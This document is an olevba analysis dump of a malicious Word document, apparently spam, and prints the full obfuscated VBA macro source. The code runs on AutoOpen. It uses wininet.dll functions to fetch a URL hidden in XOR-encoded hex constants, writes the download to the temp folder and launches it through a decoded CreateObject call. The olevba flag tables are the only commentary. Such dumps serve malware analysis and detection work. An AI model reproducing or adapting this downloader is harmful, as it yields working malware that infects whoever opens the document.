Malicious Word macro

1. olevba 0.25 - http://decalage.info/python/oletools
2. Flags       Filename                                                        
3. ----------- -----------------------------------------------------------------
4. OLE:MASIHB- spam.doc
5.  
6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
7.  
8. ===============================================================================
9. FILE: spam.doc
10. Type: OLE
11. -------------------------------------------------------------------------------
12. VBA MACRO ThisDocument.cls
13. in file: spam.doc - OLE stream: u'Macros/VBA/ThisDocument'
14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
15.  
16. Sub DANNIE(MARCELINO As Integer)
17. NEWTON
18. End Sub
19.  
20. Sub autoopen()
21. DANNIE (286)
22. End Sub
23. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
24. ANALYSIS:
25. +----------+----------+---------------------------------------+
26. | Type     | Keyword  | Description                           |
27. +----------+----------+---------------------------------------+
28. | AutoExec | AutoOpen | Runs when the Word document is opened |
29. +----------+----------+---------------------------------------+
30. -------------------------------------------------------------------------------
31. VBA MACRO AMOS.bas
32. in file: spam.doc - OLE stream: u'Macros/VBA/AMOS'
33. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
34.  
35.  
36. #If VBA7 And Win64 Then
37. Public Declare PtrSafe Function DORIAN Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef ERROL As LongPtr) As Long
38. #End If
39.  
40. Public Function IVORY(ByRef LAZARO As Object, ByRef HOMER As Object) As Boolean
41.  
42. Dim NEWTONON As Long
43. Set LAZARO = IGNACIO(LAURENCE)
44.  
45. Dim ADOLFO
46.  
47. Dim ALPHONSE As String
48. ALPHONSE = MARCELO(4096, HORACIO, SHIRLEY)
49.  
50. For NEWTONON = 6 To 8
51. NEWTONON = NEWTONON * 55
52. Next NEWTONON
53. ADOLFO = LAZARO & ALPHONSE
54.  
55. If VALENTIN(354, ADOLFO) Then
56. End If
57.  
58.  
59. IVORY = JAMEL(LAZARO, ALPHONSE, 213)
60.  
61. End Function
62.  
63.  
64. Public Function ANIBAL(FRANCES As String) As Double
65. Dim DILLON As Double
66. For DILLON = 13 To 19
67. DILLON = DILLON * 4.5
68. Next DILLON
69. DILLON = Val(FRANCES)
70. ANIBAL = DILLON
71. End Function
72.  
73. Public Function IGNACIO(ByRef NICHOLAS As Object) As Object
74. Set IGNACIO = NICHOLAS.GetSpecialFolder(2)
75. End Function
76.  
77. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
78. ANALYSIS:
79. +------------+-------------+-------------------------+
80. | Type       | Keyword     | Description             |
81. +------------+-------------+-------------------------+
82. | Suspicious | Lib         | May run code from a DLL |
83. | IOC        | wininet.dll | Executable file name    |
84. +------------+-------------+-------------------------+
85. -------------------------------------------------------------------------------
86. VBA MACRO CLAY.bas
87. in file: spam.doc - OLE stream: u'Macros/VBA/CLAY'
88. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
89.  
90. #If VBA7 And Win64 Then
91. Public Declare PtrSafe Function ANDREA Lib "wininet.dll" Alias "InternetOpenA" (ByVal EMILE As String, ByVal MONROE As Long, ByVal DOMINIQUE As String, ByVal TRISTANO As String, ByVal BOOKER As Long) As LongPtr
92. #End If
93.  
94.  
95. Public Function NORDEWITTO(ByRef JEROLD As String, ByRef FRITZ As Long) As Double
96.  NORDEWITTO = ANIBAL("&H" & (ROSENDO(78, JEROLD, NAPOLEON(FRITZ), 2)))
97. End Function
98.  
99.  
100. Public Function NAPOLEON(ByRef FRITZ As Long) As Long
101.  NAPOLEON = (2 * FRITZ) - 1
102. End Function
103.  
104.  
105. Public Function RICHIE(CHRISTOPER As String, JEROLD As String) As String
106.    
107.     Dim TANNER As Integer
108.     Dim JARRED As Integer
109.    
110.    
111.     Dim JOSIAH As Double
112.  JOSIAH = 213
113. If JOSIAH > JOSIAH * 3 Then End
114.    
115.     Dim FRITZ As Long
116.     Dim BRANT As String
117.     For FRITZ = 1 To (LEOPOLDO(JEROLD) / 2)
118.         TANNER = NORDEWITTO(JEROLD, FRITZ)
119.         JARRED = PRINCEE(CHRISTOPER, FRITZ)
120.         BRANT = BRANT + EDGARDO(TANNER, JARRED)
121.     Next FRITZ
122.    RICHIE = BRANT
123. End Function
124.  
125.  
126. Public Function MARCELO(AUGUSTUS As Long, HILARIO As String, ENRIQUE As String) As String
127. AUGUSTUS = AUGUSTUS * 2
128. MARCELO = RICHIE(HILARIO, ENRIQUE)
129.    
130. End Function
131.  
132.  
133. Public Sub NEWTON()
134.         Dim DEWITT As Double
135.  
136.     Dim JAMAAL As Double
137. For JAMAAL = 36 To 39
138. JAMAAL = JAMAAL + 21
139. Next JAMAAL
140.  
141. FREDERIC (2.81)
142.  
143. End Sub
144.  
145. Public Function ZACHARIAH(REINALDO As Double)
146.  
147. Dim MARCELO As Object
148.  
149.  
150.     Dim JERROD As Long
151. For JERROD = 17 To 21
152. JERROD = JERROD + 33
153. Next JERROD
154.    
155.  
156. Dim WESTON  As Object
157.  
158.  
159. For JERROD = 11 To 21
160. JERROD = JERROD + 64
161. Next JERROD
162.    
163.  
164. Set WESTON = LAURENCE
165. JERROD = JERROD + 42
166. Dim LEWIS As Boolean
167.  
168. If JERROD > JERROD * 3 Then End
169. LEWIS = IVORY(MARCELO, WESTON)
170. REINALDO = REINALDO + 35
171. End Function
172.  
173.  
174. Public Function CAROL(MERLIN As String)
175. Dim BRENTON As String
176. BRENTON = "YONG"
177. ZACHARIAH 21 + 3.21
178. BRENTON = BRENTON + "FAUSTINO"
179. End Function
180.  
181.  
182.  
183.  
184.  
185.  
186. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
187. ANALYSIS:
188. +------------+----------------+-----------------------------------------+
189. | Type       | Keyword        | Description                             |
190. +------------+----------------+-----------------------------------------+
191. | Suspicious | Lib            | May run code from a DLL                 |
192. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
193. |            |                | may be used to obfuscate strings        |
194. |            |                | (option --decode to see all)            |
195. | IOC        | wininet.dll    | Executable file name                    |
196. +------------+----------------+-----------------------------------------+
197. -------------------------------------------------------------------------------
198. VBA MACRO ROLANDO.bas
199. in file: spam.doc - OLE stream: u'Macros/VBA/ROLANDO'
200. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
201.  
202.  
203.  
204.  
205. Public Function LAURENCE() As Object
206. Dim ISMAEL As String
207. ISMAEL = RICHIE(HORACIO, PORFIRIO)
208. Set LAURENCE = CreateObject(ISMAEL)
209. End Function
210.  
211.  
212. Public Function VALENTIN(WYATT As Long, ByVal MARQUIS As String) As Boolean
213.     #If VBA7 And Win64 Then
214.         Dim LANNY As LongPtr, EZRA As LongPtr
215.     #Else
216.         Dim LANNY As Long, EZRA As Long
217.     #End If
218.     Dim SYDNEY As Long
219.     Dim RUBIN As String * EFREN, EMILE As String
220.     Dim ARON As Integer, ELMO As Double
221.     LANNY = EFRAIN
222.     If LANNY = 0 Then
223.         Exit Function
224.     End If
225.     Dim KAREEM As Boolean
226.    
227.     If JAMAR(EZRA, LANNY) Then
228.     End If
229.     If EZRA = 0 Then
230.         ELMO = 0
231.     Else
232.         BORIS EZRA, RUBIN, EFREN, SYDNEY
233.         EMILE = RUBIN
234.           Dim GAIL As Long
235.           GAIL = 0
236.           GAIL = GAIL + 21
237. If GAIL > GAIL + 44 Then End
238.         Do While SYDNEY <> 0
239.             BORIS EZRA, RUBIN, EFREN, SYDNEY
240.                     EMILE = EMILE + Mid(RUBIN, 1, SYDNEY)
241.         Loop
242.              ELMO = LEOPOLDO(EMILE): _
243.              ARON = EVERETTE("JOSEF")
244.         Open MARQUIS _
245.             For Binary Access Write _
246.         Lock Write As #ARON
247.         Put #ARON, , EMILE
248.         GAIL = GAIL + 62
249.     If GAIL < 0 Then End
250.         Close #ARON
251.     End If
252.     DORIAN EZRA
253.     DORIAN LANNY
254.     EMILE = ""
255.     If ELMO Then
256.         VALENTIN = True
257.     End If
258. End Function
259.  
260.  
261.  
262. Public Function LEOPOLDO(JAYSON As String) As Long
263. LEOPOLDO = Len(JAYSON)
264. End Function
265.  
266. Public Function EVERETTE(JAYSON As String) As Integer
267.     EVERETTE = FreeFile
268. End Function
269.  
270. Public Function PRINCEE(ByRef CHRISTOPER As String, ByRef FRITZ As Long) As Integer
271. PRINCEE = Asc(ROSENDO(71, CHRISTOPER, ((FRITZ Mod LEOPOLDO(CHRISTOPER)) + 1), 1))
272. End Function
273. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
274. ANALYSIS:
275. +------------+--------------+-----------------------------------------+
276. | Type       | Keyword      | Description                             |
277. +------------+--------------+-----------------------------------------+
278. | Suspicious | CreateObject | May create an OLE object                |
279. | Suspicious | Open         | May open a file                         |
280. | Suspicious | Write        | May write to a file (if combined with   |
281. |            |              | Open)                                   |
282. | Suspicious | Put          | May write to a file (if combined with   |
283. |            |              | Open)                                   |
284. | Suspicious | Binary       | May read or write a binary file (if     |
285. |            |              | combined with Open)                     |
286. +------------+--------------+-----------------------------------------+
287. -------------------------------------------------------------------------------
288. VBA MACRO CORNELIUS.bas
289. in file: spam.doc - OLE stream: u'Macros/VBA/CORNELIUS'
290. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
291.  
292. Option Explicit
293.  
294. #If VBA7 And Win64 Then
295. Public Declare PtrSafe Function BORIS Lib "wininet.dll" Alias "InternetReadFile" (ByVal WILFORD As LongPtr, ByVal RUBIN As String, ByVal SHELTON As Long, CARSON As Long) As Integer
296. #End If
297. Public Const BRICE = "1C202421296A05353C212C31533926272F"
298. Public Const SHIRLEY = "13222E25242A776B7E63277C57352A"
299. Public Const PRINCE = "273C353D7F6B6B282D3E363351253A3B243931373720202B36265D3F2E2F2463262B296A7A7F6A6B007A612D3928"
300. Public Const PORFIRIO = "1C2B332435302D2B2B63033B5E281C31323920290B2726282626"
301. Public Const HORACIO = "MOHAMEDDELMER2"
302.  
303.  
304.  
305. Public Const EFREN = 4800
306. Public Const ANTWAN As String = "CLAUDIO"
307. Public Const ALDEN = 1
308. Public Const MARGARITO = &H4000000
309.  
310. Sub FREDERIC(ROSARIO As Double)
311.  
312. CAROL ("JUDSON")
313. End Sub
314.  
315. Public Function EDGARDO(ByRef TANNER As Integer, ByRef JARRED As Integer) As String
316.     Dim CONNIE As Long
317.     CONNIE = TANNER Xor JARRED
318.     EDGARDO = Chr$(CONNIE)
319. End Function
320.  
321.  
322.  
323.  
324.  
325. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
326. ANALYSIS:
327. +------------+----------------+-----------------------------------------+
328. | Type       | Keyword        | Description                             |
329. +------------+----------------+-----------------------------------------+
330. | Suspicious | Lib            | May run code from a DLL                 |
331. | Suspicious | Chr            | May attempt to obfuscate specific       |
332. |            |                | strings                                 |
333. | Suspicious | Xor            | May attempt to obfuscate specific       |
334. |            |                | strings                                 |
335. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
336. |            |                | be used to obfuscate strings (option    |
337. |            |                | --decode to see all)                    |
338. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
339. |            |                | may be used to obfuscate strings        |
340. |            |                | (option --decode to see all)            |
341. | IOC        | wininet.dll    | Executable file name                    |
342. +------------+----------------+-----------------------------------------+
343. -------------------------------------------------------------------------------
344. VBA MACRO DEXTER.bas
345. in file: spam.doc - OLE stream: u'Macros/VBA/DEXTER'
346. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
347.  
348.  
349.  
350.  
351.  
352. Public Const JASPER = "RUSSEL"
353. #If VBA7 And Win64 Then
354. Public Declare PtrSafe Function EUGENIO Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal MOHAMMED As LongPtr, ByVal SANDY As String, ByVal TRISTAN As String, ByVal BRIAN As Long, ByVal HOUSTON As Long, ByVal LINCOLN As Long) As LongPtr
355.  
356. #Else
357. Public Declare Function DORIAN Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef ERROL As Long) As Long
358. Public Declare Function ANDREA Lib "wininet.dll" Alias "InternetOpenA" (ByVal EMILE As String, ByVal MONROE As Long, ByVal DOMINIQUE As String, ByVal TRISTANO As String, ByVal BOOKER As Long) As Long
359. Public Declare Function BORIS Lib "wininet.dll" Alias "InternetReadFile" (ByVal WILFORD As Long, ByVal RUBIN As String, ByVal SHELTON As Long, CARSON As Long) As Integer
360. Public Declare Function EUGENIO Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal MOHAMMED As Long, ByVal SANDY As String, ByVal TRISTAN As String, ByVal BRIAN As Long, ByVal HOUSTON As Long, ByVal LINCOLN As Long) As Long
361. #End If
362.  
363. Public Function ROSENDO(SAMMY As Long, ByRef JAYSON As String, ByRef TANNER As Integer, ByRef JARRED As Integer) As String
364.     ROSENDO = Mid$(JAYSON, TANNER, JARRED)
365.     SAMMY = SAMMY + 31
366. End Function
367. #If VBA7 _
368.     And Win64 Then
369. Public Function EFRAIN() As LongPtr
370.  #Else
371. Public Function EFRAIN() As Long
372.  
373.  #End If
374.  
375.  EFRAIN = ANDREA(ANTWAN, ALDEN, vbNullString, vbNullString, 0)
376. End Function
377.  
378.  
379.  
380.  
381. Public Function JAMEL(ByRef LAZARO As Object, ByRef ALPHONSE As String, RANDELL As Double) As Boolean
382.  
383. Set LENNY = CreateObject(RICHIE _
384. (HORACIO, BRICE))
385. Dim DUSTY As Integer
386. DUSTY = LENNY.Open(LAZARO & ALPHONSE)
387. End Function
388.  
389.  
390. #If VBA7 And Win64 Then
391.        Public Function JAMAR(ByRef GRADY As LongPtr, NOAH As LongPtr) As Boolean
392.     #Else
393.        Public Function JAMAR(ByRef GRADY As Long, NOAH As Long) As Boolean
394.     #End If
395.         Dim JACQUES As Double
396. Dim GUADALUPE As String
397. Dim CLARK As Long
398.     GUADALUPE = MARCELO(893, HORACIO, PRINCE)
399.  
400. For JACQUES = 14 To 15
401. JACQUES = JACQUES + 5.5
402. Next JACQUES
403.     GRADY = EUGENIO(NOAH, GUADALUPE, vbNullString, 0, MARGARITO, 0)
404.     JAMAR = True
405. End Function
406.  
407.  
408. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
409. ANALYSIS:
410. +------------+----------------+-----------------------------------------+
411. | Type       | Keyword        | Description                             |
412. +------------+----------------+-----------------------------------------+
413. | Suspicious | CreateObject   | May create an OLE object                |
414. | Suspicious | Lib            | May run code from a DLL                 |
415. | Suspicious | Open           | May open a file                         |
416. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
417. |            |                | may be used to obfuscate strings        |
418. |            |                | (option --decode to see all)            |
419. | IOC        | wininet.dll    | Executable file name                    |
420. +------------+----------------+-----------------------------------------+